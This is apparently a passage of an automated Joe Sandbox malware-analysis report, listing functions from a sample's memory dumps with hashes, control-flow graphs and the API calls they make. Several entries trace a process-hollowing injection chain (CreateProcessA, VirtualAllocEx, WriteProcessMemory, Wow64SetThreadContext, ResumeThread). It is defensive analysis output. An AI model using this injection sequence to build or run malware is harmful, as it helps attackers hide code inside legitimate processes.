                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 141ebbcab1f2d0eb20d670051b3d1e40b39825d472611e98a95b17a69efdc150
                          • Instruction ID: 17c82ace970ff2d37c3c2950cb46ea0e2be09719b303c0a0eb78bf8b389ce545
                          • Opcode Fuzzy Hash: 141ebbcab1f2d0eb20d670051b3d1e40b39825d472611e98a95b17a69efdc150
                          • Instruction Fuzzy Hash: C541F738949658CFCB20CF64D8547ECB7B9AB59305F0491EA840AA7392EB306ED6DF44
                          Function 046A3069 Relevance: .1, Instructions: 71COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 104c69e86a7bc725833a79191953697a148cf577660bce5c82cf55d92f6ffc04
                          • Instruction ID: 38c361f6dbde3e157056f6fc6d12aaa184dc7961ea25a6dc28ebe37f6f13c668
                          • Opcode Fuzzy Hash: 104c69e86a7bc725833a79191953697a148cf577660bce5c82cf55d92f6ffc04
                          • Instruction Fuzzy Hash: 4F21E738949614CFCB20DF54D9547F8B7B9AB5A315F0490DA840EA2392E730AEDADF04
                          Function 046A2B5E Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4cb70207e48ac56e6cf5e533013ad186eef94a7413c05df99cdebdbc20a66905
                          • Instruction ID: a800c7c63dd6f2d79949979914c5ce57cea562057e5dae5b70feac3749f1c5a9
                          • Opcode Fuzzy Hash: 4cb70207e48ac56e6cf5e533013ad186eef94a7413c05df99cdebdbc20a66905
                          • Instruction Fuzzy Hash: 80214A34A4A654CFCB20DF24D8547F8BBB9AB4A311F0450EAC44AA6392E734ADD6CF04
                          Function 046A2A9A Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 498e228f35157cd1c9fa42a13ca9474e25334c4ffe305b71b6b8020007996d02
                          • Instruction ID: 6f261895da574d898adfce18f5a6dfa0edbabd83cfdf8dbc984740866c224265
                          • Opcode Fuzzy Hash: 498e228f35157cd1c9fa42a13ca9474e25334c4ffe305b71b6b8020007996d02
                          • Instruction Fuzzy Hash: C4111934949654CFCB20DF64D8547ECB7B9AB5A311F0460EA840AA2392E730AED6DF44
                          Function 046A2B8E Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: afe6e2be9833605036a7629e7ff8cae403395c426925286822346f637a465e40
                          • Instruction ID: d795144a07e437fb9cd0fa3e9b43356152c8e5d4183a0aec4a14d4f0cc2e758e
                          • Opcode Fuzzy Hash: afe6e2be9833605036a7629e7ff8cae403395c426925286822346f637a465e40
                          • Instruction Fuzzy Hash: 8301213594E7958FC711CB20A8247ECBBB86B1B211F0450DAC84A963A3F6346D99CF15
                          Function 046A2DE0 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 860ab6586b204b6c337ba7865729569598457a296924fb653d3f8930ed1e1ab6
                          • Instruction ID: 10bf96e19cd74cb929cf0b6bcae74ee8fc5d835111edab81b4d2eee49c69e144
                          • Opcode Fuzzy Hash: 860ab6586b204b6c337ba7865729569598457a296924fb653d3f8930ed1e1ab6
                          • Instruction Fuzzy Hash: 6DF0FF34949654CFCB10CF64E8147FCB7B8AB5A305F0460A5940EA2312F7346DE5DF48
                          Function 046A25BE Relevance: 4.0, Strings: 3, Instructions: 202COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 42 46a25be-46a25bf 43 46a254c-46a2578 42->43 44 46a25c1-46a25dd 42->44 49 46a257a 43->49 50 46a257f-46a2595 43->50 46 46a25df 44->46 47 46a25e4-46a2775 call 46a0548 call 46a0580 44->47 46->47 63 46a2796 47->63 64 46a2777-46a2780 47->64 49->50 96 46a2598 call 46a3069 50->96 97 46a2598 call 46a2a4e 50->97 98 46a2598 call 46a2b8e 50->98 99 46a2598 call 46a2e63 50->99 100 46a2598 call 46a2a03 50->100 101 46a2598 call 46a2cc0 50->101 102 46a2598 call 46a2de0 50->102 103 46a2598 call 46a31a1 50->103 104 46a2598 call 46a2ae7 50->104 105 46a2598 call 46a2c64 50->105 106 46a2598 call 46a2a9a 50->106 107 46a2598 call 46a299e 50->107 108 46a2598 call 46a2bbe 50->108 109 46a2598 call 46a2b5e 50->109 110 46a2598 call 46a3231 50->110 111 46a2598 call 46a2bf4 50->111 56 46a259e-46a25a6 65 46a2799-46a27b3 call 46a1420 63->65 66 46a2782-46a2785 64->66 67 46a2787-46a278a 64->67 71 46a27b9 65->71 72 46a261d-46a2622 65->72 69 46a2794 66->69 67->69 69->65 75 46a27bf-46a27c3 71->75 73 46a2633-46a2641 72->73 74 46a2624-46a2625 72->74 73->75 74->73 76 46a2718-46a280d 75->76 77 46a27c9-46a27ca 75->77 79 46a26fa-46a2708 76->79 80 46a2813-46a2814 76->80 82 46a2698-46a26ac 79->82 83 46a262d-46a27fe 79->83 86 46a26ae-46a26ec 82->86 87 46a26ed-46a2804 82->87 86->87 96->56 97->56 98->56 99->56 100->56 101->56 102->56 103->56 104->56 105->56 106->56 107->56 108->56 109->56 110->56 111->56
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4,p$$p$$p
                          • API String ID: 0-3634262024
                          • Opcode ID: 24cea4a35ce72bef1b0f4ff5946fb64cb194dca86fd75bf79fbe2d58a260b2d8
                          • Instruction ID: 974b0fd361a41a9257984d65bdcdddd319b59bdc5dc2659ec4e9e78d11ac9c93
                          • Opcode Fuzzy Hash: 24cea4a35ce72bef1b0f4ff5946fb64cb194dca86fd75bf79fbe2d58a260b2d8
                          • Instruction Fuzzy Hash: B7713574E49608CFDB04CFA5D8647EDBBF5AB49300F14A0AAD405AB351E7346E56CF40
                          Function 0017FA2C Relevance: 1.8, APIs: 1, Instructions: 327processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1060 17fa2c-17fad1 1062 17fad3-17faea 1060->1062 1063 17fb1a-17fb42 1060->1063 1062->1063 1066 17faec-17faf1 1062->1066 1067 17fb44-17fb58 1063->1067 1068 17fb88-17fbde 1063->1068 1069 17fb14-17fb17 1066->1069 1070 17faf3-17fafd 1066->1070 1067->1068 1078 17fb5a-17fb5f 1067->1078 1076 17fc24-17fd1b CreateProcessA 1068->1076 1077 17fbe0-17fbf4 1068->1077 1069->1063 1071 17fb01-17fb10 1070->1071 1072 17faff 1070->1072 1071->1071 1075 17fb12 1071->1075 1072->1071 1075->1069 1096 17fd24-17fe09 1076->1096 1097 17fd1d-17fd23 1076->1097 1077->1076 1086 17fbf6-17fbfb 1077->1086 1079 17fb82-17fb85 1078->1079 1080 17fb61-17fb6b 1078->1080 1079->1068 1083 17fb6f-17fb7e 1080->1083 1084 17fb6d 1080->1084 1083->1083 1085 17fb80 1083->1085 1084->1083 1085->1079 1088 17fc1e-17fc21 1086->1088 1089 17fbfd-17fc07 1086->1089 1088->1076 1090 17fc0b-17fc1a 1089->1090 1091 17fc09 1089->1091 1090->1090 1093 17fc1c 1090->1093 1091->1090 1093->1088 1109 17fe0b-17fe0f 1096->1109 1110 17fe19-17fe1d 1096->1110 1097->1096 1109->1110 1111 17fe11 1109->1111 1112 17fe1f-17fe23 1110->1112 1113 17fe2d-17fe31 1110->1113 1111->1110 1112->1113 1114 17fe25 1112->1114 1115 17fe33-17fe37 1113->1115 1116 17fe41-17fe45 1113->1116 1114->1113 1115->1116 1117 17fe39 1115->1117 1118 17fe47-17fe70 1116->1118 1119 17fe7b-17fe86 1116->1119 1117->1116 1118->1119 1123 17fe87 1119->1123 1123->1123
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017FCFF
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 934f4c9a7315bfedce61f0746bde80e1be0a12991af0e18e16691d1c91f84d21
                          • Instruction ID: a9ffc68c915aa27dcad4c17089a483691d62a0dd809356cd6a5935e4b0efe308
                          • Opcode Fuzzy Hash: 934f4c9a7315bfedce61f0746bde80e1be0a12991af0e18e16691d1c91f84d21
                          • Instruction Fuzzy Hash: 28C12570D002198FDF25CFA8C855BEEBBB1BF09314F0095AAD819B7250DB749A86CF95
                          Function 0017FA38 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1124 17fa38-17fad1 1126 17fad3-17faea 1124->1126 1127 17fb1a-17fb42 1124->1127 1126->1127 1130 17faec-17faf1 1126->1130 1131 17fb44-17fb58 1127->1131 1132 17fb88-17fbde 1127->1132 1133 17fb14-17fb17 1130->1133 1134 17faf3-17fafd 1130->1134 1131->1132 1142 17fb5a-17fb5f 1131->1142 1140 17fc24-17fd1b CreateProcessA 1132->1140 1141 17fbe0-17fbf4 1132->1141 1133->1127 1135 17fb01-17fb10 1134->1135 1136 17faff 1134->1136 1135->1135 1139 17fb12 1135->1139 1136->1135 1139->1133 1160 17fd24-17fe09 1140->1160 1161 17fd1d-17fd23 1140->1161 1141->1140 1150 17fbf6-17fbfb 1141->1150 1143 17fb82-17fb85 1142->1143 1144 17fb61-17fb6b 1142->1144 1143->1132 1147 17fb6f-17fb7e 1144->1147 1148 17fb6d 1144->1148 1147->1147 1149 17fb80 1147->1149 1148->1147 1149->1143 1152 17fc1e-17fc21 1150->1152 1153 17fbfd-17fc07 1150->1153 1152->1140 1154 17fc0b-17fc1a 1153->1154 1155 17fc09 1153->1155 1154->1154 1157 17fc1c 1154->1157 1155->1154 1157->1152 1173 17fe0b-17fe0f 1160->1173 1174 17fe19-17fe1d 1160->1174 1161->1160 1173->1174 1175 17fe11 1173->1175 1176 17fe1f-17fe23 1174->1176 1177 17fe2d-17fe31 1174->1177 1175->1174 1176->1177 1178 17fe25 1176->1178 1179 17fe33-17fe37 1177->1179 1180 17fe41-17fe45 1177->1180 1178->1177 1179->1180 1181 17fe39 1179->1181 1182 17fe47-17fe70 1180->1182 1183 17fe7b-17fe86 1180->1183 1181->1180 1182->1183 1187 17fe87 1183->1187 1187->1187
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017FCFF
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 3cabea93ac3a3e7c0b619d491d39d7c968a86cd06bef66eef339245696e9f69b
                          • Instruction ID: 79cc500fe2fbeace9cdb8c82043e2d105afce71608653c3cf8216340e568b4d5
                          • Opcode Fuzzy Hash: 3cabea93ac3a3e7c0b619d491d39d7c968a86cd06bef66eef339245696e9f69b
                          • Instruction Fuzzy Hash: 48C12570D002198FDF25CFA8C855BEEBBB1BF09314F0091AAD819B7250DB749A86CF95
                          Function 0017F698 Relevance: 1.6, APIs: 1, Instructions: 120injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1188 17f698-17f70b 1190 17f722-17f789 WriteProcessMemory 1188->1190 1191 17f70d-17f71f 1188->1191 1193 17f792-17f7e4 1190->1193 1194 17f78b-17f791 1190->1194 1191->1190 1194->1193
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017F773
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 8e2260fa25c6211473900cab757221d7626f90baafaab91e5c380979c48e2621
                          • Instruction ID: 20788f978bec9ee2f819caeb4b8a88b86bc16c1c89ca954266733ebd677592b0
                          • Opcode Fuzzy Hash: 8e2260fa25c6211473900cab757221d7626f90baafaab91e5c380979c48e2621
                          • Instruction Fuzzy Hash: 6C41ABB5D012589FCF04CFA9D984AEEFBF1BB49314F24902AE818B7250D334AA55CF64
                          Function 0017F6A0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1199 17f6a0-17f70b 1201 17f722-17f789 WriteProcessMemory 1199->1201 1202 17f70d-17f71f 1199->1202 1204 17f792-17f7e4 1201->1204 1205 17f78b-17f791 1201->1205 1202->1201 1205->1204
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017F773
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: b5496a40cabd17e64c37b3be82bcb35475199110b4ce168239c352ca22cfa341
                          • Instruction ID: 33be77c1bcf5b2c5cd722e9382f66f4b0b28c929900f31c0ff7ceca5255f18bd
                          • Opcode Fuzzy Hash: b5496a40cabd17e64c37b3be82bcb35475199110b4ce168239c352ca22cfa341
                          • Instruction Fuzzy Hash: 5E41A9B5D002589FCF04CFA9D984AEEFBF1BB49314F20902AE818B7250D734AA45CF64
                          Function 0017F7F9 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1210 17f7f9-17f8c8 ReadProcessMemory 1213 17f8d1-17f923 1210->1213 1214 17f8ca-17f8d0 1210->1214 1214->1213
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017F8B2
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: f9c2110fe0a2d716b9dc220d924ea7c15ae7c41147352bc2220fb485d58ccf08
                          • Instruction ID: 99c313bebb13ecb73e76326a3349c9e7ad754a5e90afe3ae426dbc42216cea64
                          • Opcode Fuzzy Hash: f9c2110fe0a2d716b9dc220d924ea7c15ae7c41147352bc2220fb485d58ccf08
                          • Instruction Fuzzy Hash: EE41C8B4D002589FCF10CFA9D884AEEFBB1BF49310F20942AE814B7250C334A956CF65
                          Function 0017F800 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1219 17f800-17f8c8 ReadProcessMemory 1222 17f8d1-17f923 1219->1222 1223 17f8ca-17f8d0 1219->1223 1223->1222
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017F8B2
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 65958ccf55095441ef9e21a1cc2c660885bc0f8907c611e14757553934291b1a
                          • Instruction ID: 3bbeeb4c1d0a01b553cab8adbb701ad03e3db322b80af1e4741c9199fcd84730
                          • Opcode Fuzzy Hash: 65958ccf55095441ef9e21a1cc2c660885bc0f8907c611e14757553934291b1a
                          • Instruction Fuzzy Hash: 4941B9B5D002589FCF10CFA9D984AEEFBB1BF49310F10942AE814B7240D734A945CF65
                          Function 0017F571 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1228 17f571-17f638 VirtualAllocEx 1231 17f641-17f68b 1228->1231 1232 17f63a-17f640 1228->1232 1232->1231
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0017F622
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: f117bdd5dcd003e1410831562fe635e420dbdb2e2fd065383189f660116ecb47
                          • Instruction ID: 154716d7da3fae0f70355bd8e08648e01285481d459e4574eb4180940e9ad00d
                          • Opcode Fuzzy Hash: f117bdd5dcd003e1410831562fe635e420dbdb2e2fd065383189f660116ecb47
                          • Instruction Fuzzy Hash: FE41A9B9D002489FCF10CFA9D984AEEFBB1BB49310F20942AE815B7310D735A956CF65
                          Function 0017F578 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1237 17f578-17f638 VirtualAllocEx 1240 17f641-17f68b 1237->1240 1241 17f63a-17f640 1237->1241 1241->1240
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0017F622
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 911ed0ac3da94df17435ee843655515b4827892450c332eeeeff3e005fc63a31
                          • Instruction ID: d2e21cb6997433604dc512e75aeacbd2641bab8a9210408bd4299c6760d19563
                          • Opcode Fuzzy Hash: 911ed0ac3da94df17435ee843655515b4827892450c332eeeeff3e005fc63a31
                          • Instruction Fuzzy Hash: 5B4198B8D002589FCF10CFA9D984AEEFBB1BB49310F20942AE815B7310D735A956CF65
                          Function 0017F441 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1246 17f441-17f4a8 1248 17f4bf-17f50d Wow64SetThreadContext 1246->1248 1249 17f4aa-17f4bc 1246->1249 1251 17f516-17f562 1248->1251 1252 17f50f-17f515 1248->1252 1249->1248 1252->1251
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0017F4F7
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 514de60e52eaf6193532381a6bfa4726b29d0a3095a02bf19e15c71510851ae6
                          • Instruction ID: e88e9655f18808e99281882d02d359a542dd08bdbefa951e0a2aacd638c2ad68
                          • Opcode Fuzzy Hash: 514de60e52eaf6193532381a6bfa4726b29d0a3095a02bf19e15c71510851ae6
                          • Instruction Fuzzy Hash: 8D41ABB5D012589FCF10CFA9D984AEEFBF1AF49314F24842AE419B7240C778A94ACF54
                          Function 0017F448 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1257 17f448-17f4a8 1259 17f4bf-17f50d Wow64SetThreadContext 1257->1259 1260 17f4aa-17f4bc 1257->1260 1262 17f516-17f562 1259->1262 1263 17f50f-17f515 1259->1263 1260->1259 1263->1262
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0017F4F7
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 0786a7b44c782c2b6fc092af9c09dfa4eace44728912e7b0ce1790d7162e92a6
                          • Instruction ID: 4745d018788b088fd47c77df83db40373e83681e3861e05db1da26fafc8958ea
                          • Opcode Fuzzy Hash: 0786a7b44c782c2b6fc092af9c09dfa4eace44728912e7b0ce1790d7162e92a6
                          • Instruction Fuzzy Hash: 1241ACB5D002589FCF10CFA9D984AEEFBF1AB49314F24802AE419B7240D738A945CF54
                          Function 0017F350 Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON
                          Download Yara Rule
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 0017F3D6
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: f1f73043f17a56af360c992aacc1379361d48393b199177a6e5cc3130803e08e
                          • Instruction ID: f5336595e49fc795ddff9a0cad8d2e270dbc6b024470386512bfcdd9d8b5920e
                          • Opcode Fuzzy Hash: f1f73043f17a56af360c992aacc1379361d48393b199177a6e5cc3130803e08e
                          • Instruction Fuzzy Hash: 7C31CAB5D002499FCF10CFA9E984AEEFBB1AB49314F24942AE819B7350C774A946CF54
                          Function 0017F358 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                          Download Yara Rule
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 0017F3D6
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 6b78e631fd491b8fe645a7fd544699d12fdfdbdca096c1f695b1b4d9ceafafb1
                          • Instruction ID: 7f339f7e33ecefcca25cf6a0e7fffbdc632058a1a546b46b380bbc6f65f58f9e
                          • Opcode Fuzzy Hash: 6b78e631fd491b8fe645a7fd544699d12fdfdbdca096c1f695b1b4d9ceafafb1
                          • Instruction Fuzzy Hash: AD31B9B4D002199FCF14CFA9D984AAEFBB5BB49314F24942AE819B7340C735A945CFA4
                          Function 046A1269 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID: }(l
                          • API String ID: 0-2730413756
                          • Opcode ID: ae4fe38ce48ce0d404452621417a72384d99a569a9175fa3d10425d40f290816
                          • Instruction ID: a1ae648e82ae3681ee63537c5117c6fa788b4777ffb0a5ad56d6b1dfb56d61a8
                          • Opcode Fuzzy Hash: ae4fe38ce48ce0d404452621417a72384d99a569a9175fa3d10425d40f290816
                          • Instruction Fuzzy Hash: 4921B4B4E003088FDF14DFA4C955AADBBB2EF89305F208229D8196B366DB355D42CF54
                          Function 046A2BF4 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID: (
                          • API String ID: 0-3887548279
                          • Opcode ID: 700bd56b455c56f014c63446da1636ace35249ebfef454f9d230f25fbb350da4
                          • Instruction ID: 0613c5ce2a9ffa0560a6a495a26a6c61e4ea2ae035cb794d77dec909c8376c1c
                          • Opcode Fuzzy Hash: 700bd56b455c56f014c63446da1636ace35249ebfef454f9d230f25fbb350da4
                          • Instruction Fuzzy Hash: AD11B33594A628DFCB60CF54CA94BECB7B9BB09305F1060D5D40AA3342E730AE96DF00
                          Function 046A1D18 Relevance: .4, Instructions: 407COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: de8b567396a8d870b6f6ada628e6e124566cfe9d70037d6a944c9198bd8fe6ac
                          • Instruction ID: e050c235a9d6b9192914ba75eb38a8df00689261967ba804cdc8f4cc794c2944
                          • Opcode Fuzzy Hash: de8b567396a8d870b6f6ada628e6e124566cfe9d70037d6a944c9198bd8fe6ac
                          • Instruction Fuzzy Hash: 85E08C7044A2C45FC717CBA8AC21B797FB5AB52304B5981DBC4449B2A2E3244D69DB62
                          Function 046A0101 Relevance: .1, Instructions: 113COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d984d50a7742b52f791762a76c2b71a69648c02b410b57e02bcc7f9fc0d6d51b
                          • Instruction ID: 0f71987005f72b1374bd4f825e87fcbad92b679851743ee34b006fe58d71dc0e
                          • Opcode Fuzzy Hash: d984d50a7742b52f791762a76c2b71a69648c02b410b57e02bcc7f9fc0d6d51b
                          • Instruction Fuzzy Hash: 57416874A09618CFCB14CFA4E8487ECBBF8FB4A305F10606AD00AA3265E7346D96DF14
                          Function 046A09F3 Relevance: .1, Instructions: 104COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a85d03f5cd69f6d0729545c1e830e04eee0c03a5a896af8d16238f797f202619
                          • Instruction ID: 7d4824f03c6a6a9164b8d379ea02bfde4df49763d80f12acc58de1ef5203ba22
                          • Opcode Fuzzy Hash: a85d03f5cd69f6d0729545c1e830e04eee0c03a5a896af8d16238f797f202619
                          • Instruction Fuzzy Hash: AD31C574E49A48CFCB00CFA8E5846FDBBF8AB1A304F106015E40AA7256E775A956DF14
